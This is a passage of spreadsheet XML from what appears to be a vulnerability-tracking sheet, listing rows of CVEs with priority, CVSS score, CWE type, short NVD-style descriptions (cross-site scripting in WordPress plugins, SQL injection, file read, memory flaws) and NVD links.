      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S301" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in If-So Dynamic Content Personalization &lt;= 1.10.1 versions.</t>
        </is>
      </c>
      <c r="T301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100507</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100510</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S302" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Post and Page Builder by BoldGrid &lt;= 1.27.14 versions.</t>
        </is>
      </c>
      <c r="T302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100510</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102109</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S303" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability existed in Kiteworks Secure Data Forms, where a value derived from the authenticated user's stored account data was incorporated into a database query without proper sanitization. An authenticated user could potentially influence that value to inject SQL. Exploitation requires an authenticated session and applies only to deployments where a specific optional feature is in use.</t>
        </is>
      </c>
      <c r="T303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102109</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102376</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S304" s="5" t="inlineStr">
        <is>
          <t>Subscriber Cross Site Scripting (XSS) in Branda &lt;= 3.4.32 versions.</t>
        </is>
      </c>
      <c r="T304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102376</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102385</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="inlineStr"/>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr"/>
      <c r="K305" s="5" t="inlineStr"/>
      <c r="L305" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q305" s="5" t="inlineStr"/>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S305" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ninja Forms &lt;= 3.15.3 versions.</t>
        </is>
      </c>
      <c r="T305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102385</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102391</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="inlineStr"/>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr"/>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q306" s="5" t="inlineStr"/>
      <c r="R306" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S306" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.4 versions.</t>
        </is>
      </c>
      <c r="T306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102391</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102395</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="inlineStr"/>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K307" s="5" t="inlineStr"/>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q307" s="5" t="inlineStr"/>
      <c r="R307" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S307" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Easy Google Maps &lt;= 1.14.6 versions.</t>
        </is>
      </c>
      <c r="T307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102395</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102396</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="inlineStr"/>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr"/>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q308" s="5" t="inlineStr"/>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S308" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Ultimate Maps by Supsystic &lt;= 1.5.5 versions.</t>
        </is>
      </c>
      <c r="T308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102396</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102398</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="inlineStr"/>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr"/>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q309" s="5" t="inlineStr"/>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S309" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Popup by Supsystic &lt;= 1.13.1 versions.</t>
        </is>
      </c>
      <c r="T309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102398</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102456</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="inlineStr"/>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S310" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an SQL Injection vulnerability. Authenticated remote attackers can inject arbitrary SQL commands to read database contents.</t>
        </is>
      </c>
      <c r="T310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102456</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102457</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="inlineStr"/>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S311" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Read vulnerability. Authenticated remote attackers can exploit this vulnerability to download arbitrary system files.</t>
        </is>
      </c>
      <c r="T311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102457</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103242</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="inlineStr"/>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S312" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow flaw was found in rpm. RPMTAG_FILESIGNATURES in a crafted, unsigned RPM package's main header is declared with the wrong header type, causing hex2binv() to allocate a one-byte buffer and then write the tag's attacker-controlled, hex-decoded content — of attacker-chosen length — past the end of that allocation. This is reachable via rpm2cpio, rpm2archive, and rpm -qlvp on an untrusted package.</t>
        </is>
      </c>
      <c r="T312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103242</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27371</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="inlineStr"/>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S313" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in WPFunnels &lt;= 3.13.1 versions.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27371</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47554</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where improper verification of cryptographic signatures may cause signature verification to be bypassed under memory pressure. A successful exploit of this vulnerability might lead to denial of service and data tampering.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47554</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47602</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode driver where a local user can cause the driver to dereference an untrusted pointer. A successful exploit of this vulnerability might lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47602</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78210</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>security@octopus.com</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>In affected versions of Octopus Server, users with certain scoped permission sets could execute arbitrary scripts in an environment without possessing the required authorization.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78210</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92869</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write vulnerability exists in Pgpool-II, which may allow an authenticated attacker to cause abnormal process termination.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92869</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93512</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in JW Player for WordPress &lt;= 2.3.11 versions.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93512</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
